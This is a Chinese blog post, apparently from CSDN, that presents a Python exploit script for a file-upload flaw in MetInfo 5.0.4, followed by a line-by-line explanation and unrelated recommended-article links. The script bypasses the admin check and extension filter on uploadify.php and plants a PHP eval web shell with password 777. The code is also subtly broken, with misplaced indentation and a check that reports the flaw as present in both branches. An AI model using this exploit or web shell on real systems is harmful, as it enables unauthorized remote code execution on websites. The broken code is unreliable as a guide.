简单文件上传EXP

最新推荐文章于 2024-07-19 16:36:18 发布
最新推荐文章于 2024-07-19 16:36:18 发布
阅读量94 收藏
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77915293/article/details/131943688
版权 
import requests

url = "http://192.168.177.167/MetInfo5.0.4"

headers = {
 "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.42"
}

def checkvul(url):
   path = "/admin/include/uploadify.php"
   if requests.get(url=url+path, headers=headers).status_code == 200:
     print("[INFO] vul is exists!")
     return True
   else:
      print("[INFO] vul is exists!")
      return False

def attack(url):
     paylaod = "/admin/include/uploadify.php"
     paylaod += "?metinfo_admin_id=a"
     paylaod += "&metinfo_admin_pass=admin"
     paylaod += "&met_admin_table=met_admin_table%23"
     paylaod += "&type=upfile"
     paylaod += "&met_file_format=jpg|pphphp"

files = {
      "Filedata": ("sh.php", "<?php @eval($_REQUEST[777]);phpinfo();?>", "image/png")
 }

res = requests.post(url=url+paylaod, headers=headers, files=files)

shell_url = f"{url}/{res.text[5:]}"
print(f"shell_url is {shell_url}")

if requests.get(shell_url).status_code == 200:
     print(f"[RESULT]\n Shell: {shell_url}\n password is: 777")

if checkvul(url):
     attack(url=url)

代码详解:

这段代码是一个简单的漏洞利用脚本。下面我会逐步解释每个部分的功能和作用。

首先,通过import requests导入了一个名为requests的库,用于发送HTTP请求。

然后,定义了一个变量url,用于存储目标网站的URL,这里是"http://192.168.177.167/MetInfo5.0.4",即目标站点。

接下来,定义了一个名为headers的字典,存储了HTTP请求的头部信息。这个头部信息中包含了用户代理(User-Agent)字符串,用于伪装成浏览器进行请求。这里使用了Chrome浏览器的User-Agent字符串。

接下来是checkvul函数的定义,该函数用于检测漏洞是否存在。函数的参数是一个URL。

checkvul函数中,定义了一个变量path,存储了漏洞检测的路径"/admin/include/uploadify.php"。

接下来,通过发送一个GET请求到目标URL+路径,并带上前面定义的头部信息。然后检查响应的状态码是否为200。如果是200,表示漏洞存在,打印"[INFO] vul is exists!“,并返回True;否则,打印”[INFO] vul is not exists!",并返回False。

接下来是attack函数的定义,该函数用于攻击目标站点。函数的参数也是一个URL。

attack函数中,定义了一个变量payload,存储了攻击所使用的负载。这个负载是一系列参数的拼接,用于构造攻击请求的URL。

然后,定义了一个名为files的字典,存储了一个文件上传的参数。这个文件上传的参数包括文件的元数据和内容。

接下来,通过发送一个POST请求到目标URL+负载路径,并带上前面定义的头部信息和文件参数。然后将响应的内容赋值给变量res

然后使用切片操作,从res的第5个字符开始截取字符串,构造出一个shell_url

接下来打印出shell_url,用于显示攻击成功后的shell的URL。

然后,通过发送一个GET请求到shell_url,并检查响应的状态码是否为200。如果是200,表示攻击成功,打印 “[RESULT]\n Shell: {shell_url}\n password is: 777”。

最后,通过调用checkvul函数,检测漏洞是否存在,如果漏洞存在,则调用attack函数进行攻击。

LUZHISHENGSHELL
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
华为od机试真题 — 代表团坐车(Python)
学习,你不是一个人在战斗 ~ 961302305(QQ,微信)
07-17 575
【华为od机试真题 】代表团坐车(Python) 某组织举行会议,来了多个代表团同时到达,接待处只有一辆汽车可以同时接待多个代表团,为了提高车辆利用率,请帮接待员计算可以坐满车的接待方案输出方案数量。
使用nodejs+express实现简单文件上传功能
12-23
3.在routes/index.js中引用multer,由于还要使用到文件操作,还要引用fs模块,并指定文件上传目录 const multer = require('multer'); const fs = require('fs'); const UPLOAD_PATH = './uploads' 单文件上传: ...
Nodejs进阶:基于express+multer的文件上传实例
01-20
概览 图片上传是web开发中经常用到的功能,node社区在这方面也有了相对完善的支持。...非常简单,一行命令。 npm install express multer multer --save 每个示例下面,都有下面两个文件 ➜ upload-custom-filename
exp_Amstell-SL - MetaTrader 5EA.zip
09-11
"exp_Amstell-SL - MetaTrader 5 EA.zip" 是一个包含MetaTrader 5智能交易系统的压缩文件,其核心文件是"exp_Amstell-SL.mq5"。 1. **智能交易系统(Expert Advisor,EA)**: 智能交易系统是MetaTrader 5平台的一...
Exp_XROC2_VG_Tm - MetaTrader 5EA.zip
09-11
首先,需要将压缩包中的所有文件上传到MT5的相应文件夹:专家顾问(Experts)、指标(Indicators)和包含文件(Include)。然后,在图表上右键点击,选择"插入"->"专家顾问",找到并添加"Exp_XROC2_VG_Tm"。在专家...
Python如何将字符串连接在一起并使用`join()`方法】
最新发布
qq_36253366的博客
07-19 177
方法是字符串对象的方法,而不是列表或元组等序列类型的方法。因此,你需要先指定一个用作分隔符的字符串,然后调用这个字符串的。方法将字符串连接在一起,你需要首先确保这些字符串被存储在一个序列类型中(如列表或元组),然后调用这个序列的。方法是一个字符串方法,它用于将序列(如列表、元组等)中的元素以指定的字符连接生成一个新的字符串。列表中的所有字符串元素使用空格作为分隔符连接成一个新的字符串。方法,并将你想要作为分隔符的字符串作为参数传递给。方法,并将包含要连接字符串的序列作为参数传递。
Python每日一题:回文数
xiongxiaoxuan的博客
07-16 274
回文数是指正序(从左向右)和倒序(从右向左)读都是一样的整数。例如,121 是回文,而 123 不是。给你一个整数 x ,如果 x 是一个回文整数,返回 true;否则,返回 false。解释:从左向右读, 为 -121。从右向左读, 为 121-。因此它不是一个回文数。先将整数x转化为字符串形式,判断x和它的反转形态是否完全相等。解释:从右向左读, 为 01。需注意:True和False首字母大写!提示:-231
IPython 日志秘籍:%logstate 命令全解析
2401_85812026的博客
07-17 564
logstate命令是 IPython 日志系统的重要组成部分,它帮助我们掌控日志记录的状态。通过本文的介绍,你应该对如何在 IPython 中使用%logstate查看日志状态有了更深入的理解。记住,合理利用日志系统,可以让你的数据探索过程更加透明和可追溯。本文详细介绍了 IPython 的%logstate命令,包括其基本概念、基本用法、输出解析以及实战示例。希望本文能够帮助读者更好地利用 IPython 的日志系统,优化数据探索和科学计算的工作流。记住,掌握%logstate。
Python 中的内存管理有哪些优缺点】
qq_36253366的博客
07-19 200
Python中的内存管理是一个复杂而高效的系统,它通过自动化和抽象化的方式极大地简化了程序员的内存管理负担,但同时也存在一些潜在的缺点。
N7翻译实战
tjl521314_21的博客
07-17 301
本周完成项目实战用于训练一个简单的序列到序列(seq2seq)模型以实现英语到法语的翻译。数据预处理、模型构建、训练以及可视化损失的过程。本周学习了构建和训练一个简单的seq2seq模型用于英语到法语的翻译,对前面的知识做了一个综合的运用。
Python中使用三方库SpeechLib实现文本转换语音文件的示例(Win10)
m0_64880493的博客
07-16 181
开始用创建对象的方法CreateObject 分别创建了语音引擎对象与语音文件流对象。调用流对象的Open()方法实现语音流数据写入音频输出文件。
python训练模型报错:BrokenPipeError: [Errno 32] Broken pipe
Dxy1239310216的博客
07-18 277
如果问题持续存在,并且你的项目不是必须在 Windows 上运行,考虑在 Unix/Linux 系统上运行你的代码。确保在数据加载器中使用的任何自定义函数或类都是可序列化的,因为多进程需要能够在不同进程间传递它们。进行多进程数据加载时尤其常见,尤其是在 Windows 系统上,因为 Windows 对多进程的支持与 Unix/Linux 系统有所不同。有时候,错误可能是由其他部分的代码引起的,而不是直接由数据加载器引起。如果问题依然存在,你可能需要更详细地检查你的代码或寻求更专业的帮助。
httpx 的使用
qq_39217312的博客
07-15 810
httpx 是一个可以支持 HTTP/2.0 的库还有一个是: hyper 库这里有一个由HTTP/2.0的网站: https://spa16.scrape.center/使用 requests 库 进行爬取 报错:安装: httpx pip3 install httpx 这样安装并不能支持 HTTP/2.0如果想要支持,需要这样安装:pip3 install httpx[http2]输出:这里访问的HTTP/1.0的网站,并且依次打印除了 , 响应状态码(status_code),响应头信息(header
文件在Linux下为binary格式在Windows下为utf-8格式
qq_38220334的博客
07-17 329
想着是不是之前遇到的问题,有可能是文件中含有特殊字符,然后用vim命令来编辑这个文件,发现,还真是含有一个特殊字符,然后将它删除掉,文件就变成utf-8格式的文件了。在Windows下和Mac下都是没有问题的,在华为云服务器上也是没问题的(操作系统不是centos),但是在自己搭建的Linux服务器(centos)上是有问题的。用shell或者Python脚本去将这个文件转为utf-8格式的,但是都失败了。
LM(Levenberg-Marquardt) & PCG(预条件共轭梯度法)
weixin_41469272的博客
07-16 609
LM算法在处理非线性最小二乘问题时表现更好,能够更准确地求解参数。PCG算法虽然主要用于线性系统求解,但在引入预条件和线性化近似后,也能在一定程度上解决非线性问题。对于大规模稀疏线性系统,PCG有显著优势;而对于非线性优化问题,LM算法则表现出色。LM参考链接。
使用Python绘制一个自动变色爱心
summerriver1的博客
07-15 423
使用Python绘制一个自动变色爱心
Django prefetch_related()方法
人生苦短,何妨一试
07-15 666
prefetch_related()是 Django ORM 中用于优化查询性能的另一个重要方法,尤其在处理多对多(ManyToMany)关系和反向关系时非常有用。它允许你预加载相关对象,从而减少数据库查询次数。
[ptrade交易实战] 第十五篇 融资融券交易类函数
vv_LCJL319的博客
07-17 429
ptrade开通详则》
exp导出dmp文件
07-28
您可以使用 Oracle 数据库的 EXP 工具来导出 dmp 文件。以下是导出 dmp 文件的基本步骤: 1. 打开命令行终端或命令提示符。 2. 输入以下命令来访问 Oracle 数据库的 EXP 工具: ``` exp username/password@...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值